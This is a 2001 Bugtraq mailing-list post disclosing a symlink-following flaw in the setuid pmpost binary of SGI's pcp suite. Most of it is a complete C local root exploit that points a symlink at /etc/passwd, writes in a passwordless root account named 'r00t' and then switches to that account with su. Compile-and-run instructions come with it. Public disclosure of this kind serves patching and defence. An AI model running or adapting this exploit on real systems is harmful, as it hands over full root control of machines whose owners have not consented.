[21077] in bugtraq
pmpost - another nice symlink follower
daemon@ATHENA.MIT.EDU (Paul Starzetz)
Mon Jun 18 19:44:20 2001
Message-ID: <3B2E3638.F3E822E4@starzetz.de>
Date: Mon, 18 Jun 2001 19:11:20 +0200
From: Paul Starzetz <paul@starzetz.de>
MIME-Version: 1.0
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi,
there is a symlink handling problem in the pcp suite from SGI. The
binary pmpost will follow symlinks, if setuid root this leads to instant
root compromise, as found on SuSE 7.1 (I doubt that this a default SuSE
package, though).
Attached a simple C source to demonstrate this (gcc pm.c -o pm then
./pm)
Ihq.
---------------------- pm.c ----------------------------
/********************************************************
* *
* pmpost local root exploit *
* vulnerable: pcp <= 2.1.11-5 *
* by IhaQueR *
* *
********************************************************/
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/stat.h>
main()
{
const char *bin="/usr/share/pcp/bin/pmpost";
static char buf[512];
static char dir[128];
srand(time(NULL));
sprintf(dir, "/tmp/dupa.%.8d", rand());
if(mkdir(dir, S_IRWXU))
_exit(2);
if(chdir(dir))
_exit(3);
if(symlink("/etc/passwd", "./NOTICES"))
_exit(4);
snprintf(buf, sizeof(buf)-1, "PCP_LOG_DIR=%.500s", dir);
if(putenv(buf))
_exit(5);
if(!fork()) {
execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);
_exit(1);
}
else {
waitpid(0, NULL, WUNTRACED);
chdir("..");
sprintf(buf, "rm -rf dupa.*");
system(buf);
execl("/bin/su", "/bin/su", "r00t", NULL);
}
}
